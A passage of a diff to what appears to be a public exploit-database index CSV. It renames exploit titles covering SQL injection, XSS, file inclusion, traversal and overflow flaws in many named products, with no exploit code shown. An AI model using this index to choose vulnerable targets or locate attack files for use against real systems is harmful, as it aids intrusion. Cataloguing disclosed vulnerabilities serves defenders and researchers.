datePicker.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 25932,platforms/php/webapps/25932.txt,"EasyPHPCalendar 6.1.5/6.2.x setupSQL.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 -25933,platforms/windows/remote/25933.txt,"SlimServe HTTPD 1.0/1.1 Directory Traversal Vulnerability",2001-03-04,se00020,windows,remote,0 +25933,platforms/windows/remote/25933.txt,"slimserve httpd 1.0/1.1 - Directory Traversal vulnerability",2001-03-04,se00020,windows,remote,0 25934,platforms/php/webapps/25934.txt,"Plague News System 0.7 CID Parameter SQL Injection Vulnerability",2005-07-04,Easyex,php,webapps,0 25935,platforms/php/webapps/25935.txt,"Plague News System 0.7 CID Parameter Cross-Site Scripting Vulnerability",2005-07-04,Easyex,php,webapps,0 25936,platforms/windows/dos/25936.pl,"PlanetDNS PlanetFileServer Remote Buffer Overflow Vulnerability",2005-06-28,fRoGGz,windows,dos,0 @@ -23061,7 +23059,7 @@ id,file,description,date,author,platform,type,port 25951,platforms/php/webapps/25951.txt,"Elemental Software CartWIZ 1.20 Multiple SQL Injection Vulnerabilities",2005-07-07,"Diabolic Crab",php,webapps,0 25952,platforms/cgi/webapps/25952.txt,"Pngren 2.0.1 Kaiseki.CGI Remote Command Execution Vulnerability",2005-07-07,blahplok,cgi,webapps,0 25953,platforms/asp/webapps/25953.txt,"Comersus Open Technologies Comersus Cart 6.0.41 Multiple SQL Injection Vulnerabilities",2005-07-07,"Diabolic Crab",asp,webapps,0 -25954,platforms/php/webapps/25954.txt,"PHPAuction 2.5 Multiple Vulnerabilities",2005-07-07,Dcrab,php,webapps,0 +25954,platforms/php/webapps/25954.txt,"phpauction 2.5 - Multiple Vulnerabilities",2005-07-07,Dcrab,php,webapps,0 25955,platforms/php/webapps/25955.txt,"PhotoGal 1.0/1.5 News_File Remote File Include Vulnerability",2005-07-07,"skdaemon porra",php,webapps,0 25956,platforms/asp/webapps/25956.txt,"Comersus Open Technologies Comersus Cart 6.0.41 Multiple Cross-Site Scripting Vulnerabilities",2005-07-07,"Diabolic Crab",asp,webapps,0 25957,platforms/php/webapps/25957.txt,"PunBB 1.x Profile.PHP User Profile Edit Module SQL Injection Vulnerability",2005-07-08,"Stefan Esser",php,webapps,0 @@ -23124,11 +23122,11 @@ id,file,description,date,author,platform,type,port 26017,platforms/cgi/webapps/26017.txt,"Greasemonkey 0.3.3 Multiple Remote Information Disclosure Vulnerabilities",2005-07-20,"Mark Pilgrim",cgi,webapps,0 26018,platforms/php/webapps/26018.txt,"Pyrox Search 1.0.5 Newsearch.PHP Whatdoreplace Cross-Site Scripting Vulnerability",2005-07-21,rgod,php,webapps,0 26019,platforms/php/webapps/26019.txt,"Contrexx 1.0.4 Multiple Input Validation Vulnerabilities",2005-07-22,"Christopher Kunz",php,webapps,0 -26020,platforms/php/webapps/26020.txt,"Asn Guestbook 1.5 header.php version Parameter XSS",2005-07-22,rgod,php,webapps,0 -26021,platforms/php/webapps/26021.txt,"Asn Guestbook 1.5 footer.php version Parameter XSS",2005-07-22,rgod,php,webapps,0 +26020,platforms/php/webapps/26020.txt,"Asn Guestbook 1.5 - header.php version Parameter XSS",2005-07-22,rgod,php,webapps,0 +26021,platforms/php/webapps/26021.txt,"Asn Guestbook 1.5 - footer.php version Parameter XSS",2005-07-22,rgod,php,webapps,0 26022,platforms/hardware/remote/26022.txt,"ECI Telecom B-FOCuS Router 312+ Unauthorized Access Vulnerability",2005-07-25,d.is.evil,hardware,remote,0 26023,platforms/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 Apa_PHPInclude.INC.PHP Remote File Include Vulnerability",2005-07-25,lwdz,php,webapps,0 -26024,platforms/linux/remote/26024.txt,"SAP Internet Graphics Server 6.40 Directory Traversal Vulnerability",2005-07-25,"Martin O'Neal",linux,remote,0 +26024,platforms/linux/remote/26024.txt,"sap internet graphics server 6.40 - Directory Traversal vulnerability",2005-07-25,"Martin O'Neal",linux,remote,0 26025,platforms/php/webapps/26025.txt,"Netquery 3.1 submit.php portnum Parameter XSS",2005-07-25,rgod,php,webapps,0 26026,platforms/php/webapps/26026.txt,"Netquery 3.1 nqgeoip2.php Multiple Parameter XSS",2005-07-25,rgod,php,webapps,0 26027,platforms/php/webapps/26027.txt,"Netquery 3.1 nqgeoip.php step Parameter XSS",2005-07-25,rgod,php,webapps,0 @@ -23312,7 +23310,7 @@ id,file,description,date,author,platform,type,port 26207,platforms/php/webapps/26207.txt,"Land Down Under 700/701/800/801 list.php Multiple Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 26208,platforms/php/webapps/26208.txt,"AutoLinks 2.1 Pro Al_initialize.PHP Remote File Include Vulnerability",2005-08-29,4Degrees,php,webapps,0 26209,platforms/php/webapps/26209.txt,"PHP-Fusion 4.0/5.0/6.0 BBCode URL Tag Script Injection Vulnerability",2005-08-29,slacker4ever_1,php,webapps,0 -26210,platforms/multiple/remote/26210.txt,"BFCommand & Control Server 1.22/2.0/2.14 Manager Multiple Remote Vulnerabilities",2005-08-29,"Luigi Auriemma",multiple,remote,0 +26210,platforms/multiple/remote/26210.txt,"bfcommand & control server 1.22/2.0/2.14 manager Multiple Vulnerabilities",2005-08-29,"Luigi Auriemma",multiple,remote,0 26211,platforms/php/webapps/26211.txt,"phpldapadmin 0.9.6/0.9.7 welcome.php custom_welcome_page Variable Arbitrary File Inclusion",2005-08-30,rgod,php,webapps,0 26212,platforms/php/webapps/26212.txt,"FlatNuke 2.5.6 ID Parameter Directory Traversal Vulnerability",2005-08-31,rgod,php,webapps,0 26213,platforms/php/webapps/26213.txt,"LibrettoCMS 2.2.2 - Arbitrary File Upload",2013-06-14,"CWH Underground",php,webapps,0 @@ -23398,7 +23396,7 @@ id,file,description,date,author,platform,type,port 26296,platforms/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 Local File Include Vulnerability",2005-08-23,rgod,php,webapps,0 26297,platforms/php/webapps/26297.txt,"PHPMyFAQ 1.5.1 Logs Unauthorized Access Vulnerability",2005-08-23,rgod,php,webapps,0 26298,platforms/php/webapps/26298.txt,"CMS Made Simple 0.10 Index.PHP Cross-Site Scripting Vulnerability",2005-09-26,X1ngBox,php,webapps,0 -26299,platforms/windows/remote/26299.c,"MultiTheftAuto 0.5 Multiple Remote Vulnerabilities",2005-09-26,"Luigi Auriemma",windows,remote,0 +26299,platforms/windows/remote/26299.c,"multitheftauto 0.5 Multiple Vulnerabilities",2005-09-26,"Luigi Auriemma",windows,remote,0 26300,platforms/php/webapps/26300.txt,"LucidCMS 2.0 Index.PHP Cross-Site Scripting Vulnerability",2005-09-27,X1ngBox,php,webapps,0 26301,platforms/windows/dos/26301.txt,"Novell GroupWise 6.5.3 Client Local Integer Overflow Vulnerability",2005-09-27,"Francisco Amato",windows,dos,0 26302,platforms/php/webapps/26302.txt,"TWiki TWikiUsers INCLUDE Function Remote Arbitrary Command Execution Vulnerability",2005-09-28,JChristophFuchs,php,webapps,0 @@ -23426,7 +23424,7 @@ id,file,description,date,author,platform,type,port 26328,platforms/php/webapps/26328.txt,"Utopia News Pro 1.1.3 footer.php Multiple Parameter XSS",2005-10-07,rgod,php,webapps,0 26329,platforms/multiple/remote/26329.txt,"Oracle HTML DB 1.5/1.6 f p Parameter XSS",2005-10-07,Red-Database-Security,multiple,remote,0 26330,platforms/multiple/remote/26330.txt,"Oracle HTML DB 1.5/1.6 wwv_flow.accept p_t02 Parameter XSS",2005-10-07,Red-Database-Security,multiple,remote,0 -26331,platforms/multiple/dos/26331.txt,"Oracle 9.0 iSQL*Plus TLS Listener Remote Denial Of Service Vulnerability",2005-10-07,"Alexander Kornbrust",multiple,dos,0 +26331,platforms/multiple/dos/26331.txt,"Oracle 9.0 iSQL*Plus TLS Listener - Remote Denial Of Service Vulnerability",2005-10-07,"Alexander Kornbrust",multiple,dos,0 26332,platforms/multiple/remote/26332.txt,"Oracle 9 XML DB Cross-Site Scripting Vulnerability",2005-10-07,"Alexander Kornbrust",multiple,remote,0 26333,platforms/asp/webapps/26333.html,"Aenovo /password/default.asp password Field SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 26334,platforms/asp/webapps/26334.txt,"aeNovo /incs/searchdisplay.asp strSQL Parameter SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 @@ -23461,7 +23459,7 @@ id,file,description,date,author,platform,type,port 26363,platforms/php/webapps/26363.txt,"MySource 2.14 init_mysource.php INCLUDE_PATH Parameter Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26364,platforms/php/webapps/26364.txt,"MySource 2.14 Socket.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26365,platforms/php/webapps/26365.txt,"MySource 2.14 Request.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 -26366,platforms/php/webapps/26366.txt,"GLPI v0.83.8 - Multiple Vulnerabilities",2013-06-21,LiquidWorm,php,webapps,0 +26366,platforms/php/webapps/26366.txt,"GLPI 0.83.8 - Multiple Vulnerabilities",2013-06-21,LiquidWorm,php,webapps,0 26367,platforms/windows/local/26367.py,"Adrenalin Player 2.2.5.3 (.asx) - SEH Buffer Overflow",2013-06-21,Onying,windows,local,0 26368,platforms/freebsd/local/26368.c,"FreeBSD 9.0-9.1 mmap/ptrace Privilege Esclation Exploit",2013-06-21,Hunger,freebsd,local,0 26369,platforms/php/webapps/26369.txt,"MySource 2.14 Mail.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 @@ -23625,7 +23623,7 @@ id,file,description,date,author,platform,type,port 26533,platforms/jsp/webapps/26533.txt,"Revize CMS Revize.XML Information Disclosure Vulnerability",2005-11-17,Lostmon,jsp,webapps,0 26534,platforms/jsp/webapps/26534.txt,"Revize CMS HTTPTranslatorServlet Cross-Site Scripting Vulnerability",2005-11-17,Lostmon,jsp,webapps,0 26535,platforms/php/webapps/26535.txt,"LiteSpeed 2.1.5 ConfMgr.php Cross-Site Scripting Vulnerability",2005-11-17,"Gama Sec",php,webapps,0 -26536,platforms/linux/remote/26536.txt,"Qualcomm Worldmail Server 3.0 Directory Traversal Vulnerability",2005-11-17,FistFuXXer,linux,remote,0 +26536,platforms/linux/remote/26536.txt,"qualcomm worldmail server 3.0 - Directory Traversal vulnerability",2005-11-17,FistFuXXer,linux,remote,0 26537,platforms/asp/webapps/26537.html,"VP-ASP Shopping Cart Shopadmin.ASP HTML Injection Vulnerability",2005-11-17,ConcorDHacK,asp,webapps,0 26538,platforms/php/webapps/26538.txt,"PHP-Fusion 4.0/5.0/6.0 Options.php and Viewforum.php SQL Injection Vulnerabilities",2005-11-19,"Robin Verton",php,webapps,0 26539,platforms/php/webapps/26539.txt,"Advanced Poll 2.0.2/2.0.3 Popup.PHP Cross-Site Scripting Vulnerability",2005-11-21,[GB],php,webapps,0 @@ -23862,10 +23860,10 @@ id,file,description,date,author,platform,type,port 26777,platforms/asp/webapps/26777.txt,"LocazoList Classifieds 1.0 SearchDB.ASP Input Validation Vulnerability",2005-12-12,r0t3d3Vil,asp,webapps,0 26778,platforms/jsp/webapps/26778.txt,"Blackboard Academic Suite 6.2.3.23 Frameset.JSP Cross-Domain Frameset Loading Vulnerability",2005-12-12,dr_insane,jsp,webapps,0 26779,platforms/windows/dos/26779.txt,"Alt-N MDaemon WorldClient 8.1.3 Denial Of Service Vulnerability",2005-12-12,dr_insane,windows,dos,0 -26780,platforms/php/webapps/26780.txt,"Scout Portal Toolkit 1.3.1 SPT--QuickSearch.php Multiple Parameter XSS",2005-12-12,Preddy,php,webapps,0 -26781,platforms/php/webapps/26781.txt,"Scout Portal Toolkit 1.3.1 SPT--BrowseResources.php ParentId Parameter XSS",2005-12-12,Preddy,php,webapps,0 -26782,platforms/php/webapps/26782.txt,"Scout Portal Toolkit 1.3.1 SPT--AdvancedSearch.php Multiple Parameter XSS",2005-12-12,Preddy,php,webapps,0 -26783,platforms/php/webapps/26783.txt,"Scout Portal Toolkit 1.3.1 SPT--UserLogin.php Multiple Parameter SQL Injection",2005-12-12,Preddy,php,webapps,0 +26780,platforms/php/webapps/26780.txt,"Scout Portal Toolkit 1.3.1 - SPT-QuickSearch.php Multiple Parameter XSS",2005-12-12,Preddy,php,webapps,0 +26781,platforms/php/webapps/26781.txt,"Scout Portal Toolkit 1.3.1 - SPT-BrowseResources.php ParentId Parameter XSS",2005-12-12,Preddy,php,webapps,0 +26782,platforms/php/webapps/26782.txt,"Scout Portal Toolkit 1.3.1 - SPT-AdvancedSearch.php Multiple Parameter XSS",2005-12-12,Preddy,php,webapps,0 +26783,platforms/php/webapps/26783.txt,"Scout Portal Toolkit 1.3.1 - SPT-UserLogin.php Multiple Parameter SQL Injection",2005-12-12,Preddy,php,webapps,0 26784,platforms/php/webapps/26784.txt,"BTGrup Admin WebController SQL Injection Vulnerability",2005-12-12,khc@bsdmail.org,php,webapps,0 26785,platforms/php/webapps/26785.txt,"Arab Portal 2.0 Link.PHP SQL Injection Vulnerabilities",2005-12-12,stranger-killer,php,webapps,0 26786,platforms/cgi/webapps/26786.txt,"EveryAuction 1.53 Auction.PL Cross-Site Scripting Vulnerability",2005-12-13,$um$id,cgi,webapps,0 @@ -24053,7 +24051,7 @@ id,file,description,date,author,platform,type,port 26969,platforms/asp/webapps/26969.txt,"Tangora Portal CMS 4.0 Action Parameter Cross-Site Scripting Vulnerability",2005-12-22,r0t3d3Vil,asp,webapps,0 26970,platforms/windows/local/26970.c,"McAfee VirusScan 8.0 Path Specification Local Privilege Escalation Vulnerability",2005-12-22,"Reed Arvin",windows,local,0 26971,platforms/osx/dos/26971.txt,"Apple Mac OS X KHTMLParser Remote Denial of Service Vulnerability",2005-12-22,"Tom Ferris",osx,dos,0 -26972,platforms/jsp/webapps/26972.txt,"Oracle Application Server Discussion Forum Portlet Multiple Remote Vulnerabilities",2005-12-23,"Johannes Greil",jsp,webapps,0 +26972,platforms/jsp/webapps/26972.txt,"oracle application server discussion forum portlet Multiple Vulnerabilities",2005-12-23,"Johannes Greil",jsp,webapps,0 26973,platforms/php/webapps/26973.txt,"Cerberus Helpdesk 2.649 cer_KnowledgebaseHandler.class.php _load_article_details Function SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 26974,platforms/php/webapps/26974.txt,"Cerberus Helpdesk 2.649 addresses_export.php queues Parameter SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 26975,platforms/php/webapps/26975.txt,"Cerberus Helpdesk 2.649 display_ticket_thread.php ticket Parameter SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 @@ -24213,7 +24211,7 @@ id,file,description,date,author,platform,type,port 27133,platforms/mips/remote/27133.py,"ASUS RT-AC66U acsd Param - Remote Root Shell Exploit",2013-07-27,"Jacob Holcomb",mips,remote,0 27134,platforms/hardware/webapps/27134.pl,"Broadkam PJ871 Authentication Bypass",2013-07-27,d3c0der,hardware,webapps,0 27135,platforms/multiple/remote/27135.rb,"Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution",2013-07-27,metasploit,multiple,remote,8080 -27136,platforms/php/webapps/27136.txt,"Symantec Web Gateway 5.1.0 - Multiple Vulnerabilities",2013-07-27,"SEC Consult",php,webapps,0 +27136,platforms/php/webapps/27136.txt,"Symantec Web Gateway 5.1.0.x - Multiple Vulnerabilities",2013-07-27,"SEC Consult",php,webapps,0 27137,platforms/php/webapps/27137.txt,"MyBB 1.0.2 Multiple Cross-Site Scripting Vulnerabilities",2005-12-26,imei,php,webapps,0 27138,platforms/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 Comentarios.PHP SQL Injection Vulnerability",2006-01-26,"Aliaksandr Hartsuyeu",php,webapps,0 27139,platforms/php/webapps/27139.txt,"My Little Homepage Products BBCode Link Tag Script Injection Vulnerability",2006-01-26,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24362,7 +24360,7 @@ id,file,description,date,author,platform,type,port 27287,platforms/php/webapps/27287.txt,"Cotonti 0.9.13 - SQL Injection Vulnerability",2013-08-02,"High-Tech Bridge SA",php,webapps,0 27288,platforms/hardware/webapps/27288.txt,"Western Digital My Net Wireless Routers - Password Disclosure",2013-08-02,"Kyle Lovett",hardware,webapps,0 27289,platforms/hardware/webapps/27289.txt,"TP-Link TL-SC3171 IP Cameras - Multiple Vulnerabilities",2013-08-02,"Core Security",hardware,webapps,0 -27290,platforms/php/webapps/27290.txt,"Wordpress Better WP Security Plugin - Stored XSS",2013-08-02,"Richard Warren",php,webapps,0 +27290,platforms/php/webapps/27290.txt,"Wordpress Plugin Better WP Security - Stored XSS",2013-08-02,"Richard Warren",php,webapps,0 27291,platforms/windows/webapps/27291.txt,"Oracle Hyperion 11 - Directory Traversal",2013-08-02,"Richard Warren",windows,webapps,19000 27292,platforms/windows/dos/27292.py,"EchoVNC Viewer Remote DoS Vulnerability",2013-08-02,Z3r0n3,windows,dos,0 27293,platforms/php/remote/27293.rb,"PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution",2013-08-02,metasploit,php,remote,7443 @@ -24406,7 +24404,7 @@ id,file,description,date,author,platform,type,port 27331,platforms/php/webapps/27331.txt,"n8cms 1.1/1.2 index.php Multiple Parameter XSS",2006-02-27,Liz0ziM,php,webapps,0 27332,platforms/php/webapps/27332.txt,"n8cms 1.1/1.2 mailto.php userid Parameter XSS",2006-02-27,Liz0ziM,php,webapps,0 27333,platforms/php/webapps/27333.txt,"QwikiWiki 1.4 Index.PHP Cross-Site Scripting Vulnerability",2006-02-28,Dr^Death,php,webapps,0 -27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 w/ Sendmail Mail Function additional_parameters Argument Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0 +27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function additional_parameters - Argument Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0 27335,platforms/php/local/27335.txt,"PHP 4.x/5.0/5.1 mb_send_mail() Function Parameter Restriction Bypass",2006-02-28,ced.clerget@free.fr,php,local,0 27336,platforms/php/webapps/27336.txt,"EJ3 TOPo 2.2.178 Inc_header.PHP Cross-Site Scripting Vulnerability",2006-02-28,"Yunus Emre Yilmaz",php,webapps,0 27337,platforms/php/webapps/27337.txt,"Mozilla Thunderbird 1.5 Multiple Remote Information Disclosure Vulnerabilities",2006-02-28,Crashfr,php,webapps,0 @@ -24612,10 +24610,10 @@ id,file,description,date,author,platform,type,port 27544,platforms/php/webapps/27544.txt,"SoftBiz Image Gallery 0 suggest_image.php cid Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 27545,platforms/php/webapps/27545.txt,"SoftBiz Image Gallery 0 insert_rating.php img_id Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 27546,platforms/php/webapps/27546.txt,"SoftBiz Image Gallery 0 images.php cid Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 -27547,platforms/multiple/dos/27547.txt,"ZDaemon 1.8.1 Multiple Remote Vulnerabilities",2006-03-31,"Luigi Auriemma",multiple,dos,0 +27547,platforms/multiple/dos/27547.txt,"zdaemon 1.8.1 Multiple Vulnerabilities",2006-03-31,"Luigi Auriemma",multiple,dos,0 27548,platforms/php/webapps/27548.txt,"Claroline 1.x Rqmkhtml.PHP Information Disclosure Vulnerability",2006-03-31,rgod,php,webapps,0 27549,platforms/php/webapps/27549.txt,"Claroline 1.x RQMKHTML.PHP Cross-Site Scripting Vulnerability",2006-03-31,rgod,php,webapps,0 -27550,platforms/php/webapps/27550.txt,"Blank'N'Berg 0.2 Directory Traversal Vulnerability",2006-03-31,"Amine ABOUD",php,webapps,0 +27550,platforms/php/webapps/27550.txt,"blank'n'berg 0.2 - Directory Traversal vulnerability",2006-03-31,"Amine ABOUD",php,webapps,0 27551,platforms/php/webapps/27551.txt,"Blank'N'Berg 0.2 Cross-Site Scripting Vulnerability",2006-03-31,"Amine ABOUD",php,webapps,0 27552,platforms/asp/webapps/27552.txt,"ISP Site Man 0 Admin_Login.ASP SQL Injection Vulnerability",2006-04-01,s3rv3r_hack3r,asp,webapps,0 27553,platforms/windows/dos/27553.py,"onehttpd 0.7 - Denial of Service",2013-08-13,superkojiman,windows,dos,8080 @@ -24802,7 +24800,7 @@ id,file,description,date,author,platform,type,port 27743,platforms/php/webapps/27743.txt,"MySmartBB 1.1.2/1.1.3 Multiple Input Validation Vulnerabilities",2006-04-04,BoNy-m,php,webapps,0 27744,platforms/windows/remote/27744.html,"Microsoft Internet Explorer 5.0.1 Modal Dialog Manipulation Vulnerability",2006-04-26,"Matthew Murphy",windows,remote,0 27745,platforms/windows/dos/27745.txt,"Outlook Express 5.5/6.0,Windows Mail MHTML URI Handler Information Disclosure Vulnerability",2006-04-27,codedreamer,windows,dos,0 -27746,platforms/windows/remote/27746.txt,"WinISO 5.3 Directory Traversal Vulnerability",2006-04-28,sowhat,windows,remote,0 +27746,platforms/windows/remote/27746.txt,"winiso 5.3 - Directory Traversal vulnerability",2006-04-28,sowhat,windows,remote,0 27747,platforms/windows/remote/27747.pl,"freeFTPd 1.0.10 (PASS Command) - SEH Buffer Overflow",2013-08-21,Wireghoul,windows,remote,21 27749,platforms/hardware/dos/27749.rb,"Schneider Electric PLC ETY Series Ethernet Controller - Denial of Service",2013-08-21,"Arash Abedian",hardware,dos,0 27750,platforms/php/webapps/27750.py,"Bitbot C2 Panel gate2.php - Multiple Vulnerabilities",2013-08-21,bwall,php,webapps,0 @@ -24813,9 +24811,9 @@ id,file,description,date,author,platform,type,port 27755,platforms/windows/webapps/27755.txt,"Adobe ColdFusion 9 Administrative Login Bypass",2013-08-21,"Scott Buckel",windows,webapps,0 27756,platforms/hardware/webapps/27756.txt,"Sitecom N300/N600 Devices - Multiple Vulnerabilities",2013-08-21,"Roberto Paleari",hardware,webapps,0 27757,platforms/asp/webapps/27757.txt,"DUclassified Detail.ASP SQL Injection Vulnerability",2006-04-28,sadegh.sarshogh,asp,webapps,0 -27758,platforms/windows/remote/27758.txt,"EZB Systems UltraISO 8.0.1392 Directory Traversal Vulnerability",2006-04-28,sowhat,windows,remote,0 -27759,platforms/windows/remote/27759.txt,"MagicISO 5.0 Build 0166 Directory Traversal Vulnerability",2006-04-28,sowhat,windows,remote,0 -27760,platforms/windows/remote/27760.txt,"PowerISO 2.9 Directory Traversal Vulnerability",2006-04-28,sowhat,windows,remote,0 +27758,platforms/windows/remote/27758.txt,"ezb systems ultraiso 8.0.1392 - Directory Traversal vulnerability",2006-04-28,sowhat,windows,remote,0 +27759,platforms/windows/remote/27759.txt,"magiciso 5.0 build 0166 - Directory Traversal vulnerability",2006-04-28,sowhat,windows,remote,0 +27760,platforms/windows/remote/27760.txt,"poweriso 2.9 - Directory Traversal vulnerability",2006-04-28,sowhat,windows,remote,0 27761,platforms/cgi/webapps/27761.txt,"NeoMail NeoMail.PL SessionID Parameter Cross-Site Scripting Vulnerability",2006-04-28,O.U.T.L.A.W,cgi,webapps,0 27762,platforms/linux/dos/27762.txt,"LibTiff 3.x Multiple Denial of Service Vulnerabilities",2006-04-28,"Tavis Ormandy",linux,dos,0 27763,platforms/php/webapps/27763.php,"I-RATER Platinum Config_settings.TPL.PHP Remote File Include Vulnerability",2006-04-28,O.U.T.L.A.W,php,webapps,0 @@ -24905,7 +24903,7 @@ id,file,description,date,author,platform,type,port 27848,platforms/php/webapps/27848.txt,"EImagePro 0 view.asp Pic Parameter SQL Injection",2006-05-09,Dj_Eyes,php,webapps,0 27849,platforms/asp/webapps/27849.txt,"EDirectoryPro Search_result.ASP SQL Injection Vulnerability",2006-05-09,Dj_Eyes,asp,webapps,0 27850,platforms/windows/dos/27850.txt,"Microsoft Infotech Storage Library Heap Corruption Vulnerability",2006-05-09,"Ruben Santamarta",windows,dos,0 -27851,platforms/windows/remote/27851.bat,"Microsoft Windows Path Conversion Weakness",2006-05-10,"Mario Ballano BĂ¡rcena",windows,remote,0 +27851,platforms/windows/remote/27851.bat,"Microsoft Windows - Path Conversion Weakness",2006-05-10,"Mario Ballano BĂ¡rcena",windows,remote,0 27852,platforms/multiple/remote/27852.pl,"Symantec Enterprise Firewall / Gateway Security HTTP Proxy Internal IP Leakage Weakness",2006-05-10,"Bernhard Mueller",multiple,remote,0 27853,platforms/cfm/webapps/27853.txt,"Cartweaver 2.16.11 Results.cfm category Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0 27854,platforms/cfm/webapps/27854.txt,"Cartweaver 2.16.11 Details.cfm ProdID Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0 @@ -25264,7 +25262,7 @@ id,file,description,date,author,platform,type,port 28219,platforms/php/webapps/28219.txt,"Koobi Pro 5.6 showtopic Module toid Parameter SQL Injection",2006-07-13,"Evampire chiristof",php,webapps,0 28220,platforms/linux/dos/28220.txt,"KDE Konqueror 3.5.x ReplaceChild Denial Of Service Vulnerability",2006-07-14,hdm,linux,dos,0 28221,platforms/php/webapps/28221.pl,"Invision Power Board 2.1.x IPSClass.PHP SQL Injection Vulnerability (1)",2006-07-13,1dt.w0lf,php,webapps,0 -28222,platforms/windows/dos/28222.txt,"Microsoft Works 8.0 Spreadsheet Multiple Remote Vulnerabilities",2006-06-14,"Benjamin Franz",windows,dos,0 +28222,platforms/windows/dos/28222.txt,"microsoft works 8.0 spreadsheet Multiple Vulnerabilities",2006-06-14,"Benjamin Franz",windows,dos,0 28223,platforms/php/webapps/28223.txt,"Subberz Lite UserFunc Remote File Include Vulnerability",2006-07-14,"Chironex Fleckeri",php,webapps,0 28224,platforms/windows/remote/28224.c,"Microsoft PowerPoint 2003 mso.dll PPT Processing Unspecified Code Execution",2006-07-14,"naveed afzal",windows,remote,0 28225,platforms/windows/remote/28225.c,"Microsoft PowerPoint 2003 powerpnt.exe Unspecified Issue",2006-07-14,"naveed afzal",windows,remote,0 @@ -25352,7 +25350,7 @@ id,file,description,date,author,platform,type,port 28310,platforms/php/webapps/28310.txt,"Moskool 1.5 Component Admin.Moskool.PHP Remote File Include Vulnerability",2006-07-31,saudi.unix,php,webapps,0 28311,platforms/php/webapps/28311.txt,"myEvent 1.2/1.3 Myevent.PHP Remote File Include Vulnerability",2006-07-31,CeNGiZ-HaN,php,webapps,0 28312,platforms/multiple/remote/28312.txt,"VMware ESX 2.x Multiple Information Disclosure Vulnerabilities",2006-07-31,"Stephen de Vries",multiple,remote,0 -28314,platforms/linux/remote/28314.c,"Bomberclone 0.11 Multiple Remote Vulnerabilities",2006-07-31,"Luigi Auriemma",linux,remote,0 +28314,platforms/linux/remote/28314.c,"bomberclone 0.11 Multiple Vulnerabilities",2006-07-31,"Luigi Auriemma",linux,remote,0 28315,platforms/php/webapps/28315.txt,"Help Center Live 2.1.2 Module.PHP Directory Traversal Vulnerability",2006-07-31,Dr.GooGle,php,webapps,0 28316,platforms/php/webapps/28316.txt,"TinyPHPForum 3.6 Multiple Cross-Site Scripting Vulnerabilities",2006-07-31,SirDarckCat,php,webapps,0 28317,platforms/php/webapps/28317.txt,"WoW Roster 1.5 hsList.php subdir Parameter Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 @@ -25405,7 +25403,7 @@ id,file,description,date,author,platform,type,port 28365,platforms/multiple/remote/28365.txt,"Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability",2006-08-09,"Susam Pal",multiple,remote,0 28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x Mybloggie_Root_Path Parameter Multiple Remote File Include Vulnerabilities",2006-06-02,sh3ll,php,webapps,0 28367,platforms/linux/dos/28367.txt,"AlsaPlayer 0.99.x Multiple Buffer Overflow Vulnerabilities",2006-08-09,"Luigi Auriemma",linux,dos,0 -28368,platforms/multiple/remote/28368.txt,"ArcSoft MMS Composer 1.5.5/2.0 Multiple Vulnerabilities",2006-08-09,"Collin R. Mulliner",multiple,remote,0 +28368,platforms/multiple/remote/28368.txt,"ArcSoft MMS Composer 1.5.5/2.0 - Multiple Vulnerabilities",2006-08-09,"Collin R. Mulliner",multiple,remote,0 28369,platforms/windows/dos/28369.dpr,"IrfanView 3.98 ANI Image File Denial Of Service Vulnerability",2006-08-09,sehato,windows,dos,0 28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 Big.PHP Remote File Include Vulnerability",2006-08-10,sh3ll,php,webapps,0 28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x Index.PHP Cross-Site Scripting Vulnerability",2006-08-10,O.U.T.L.A.W,php,webapps,0 @@ -25418,7 +25416,7 @@ id,file,description,date,author,platform,type,port 28378,platforms/php/webapps/28378.txt,"MyWebland miniBloggie 1.0 Fname Remote File Include Vulnerability",2006-08-10,sh3ll,php,webapps,0 28379,platforms/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 Install3.PHP Remote File Include Vulnerability",2006-08-10,"Philipp Niedziela",php,webapps,0 28380,platforms/linux/dos/28380.txt,"Mozilla Firefox 1.0.x JavaScript Handler Race Condition Memory Corruption Vulnerability",2006-08-12,"Michal Zalewski",linux,dos,0 -28381,platforms/windows/dos/28381.txt,"Microsoft Windows XP/2000/2003 Help Multiple Remote Vulnerabilities",2006-08-12,"Benjamin Tobias Franz",windows,dos,0 +28381,platforms/windows/dos/28381.txt,"microsoft windows xp/2000/2003 help Multiple Vulnerabilities",2006-08-12,"Benjamin Tobias Franz",windows,dos,0 28382,platforms/php/webapps/28382.txt,"WP-DB Backup For Wordpress 1.6/1.7 Edit.PHP Directory Traversal Vulnerability",2006-08-14,"marc & shb",php,webapps,0 28383,platforms/linux/dos/28383.txt,"ImageMagick 6.x SGI Image File Remote Heap Buffer Overflow Vulnerability",2006-08-14,"Damian 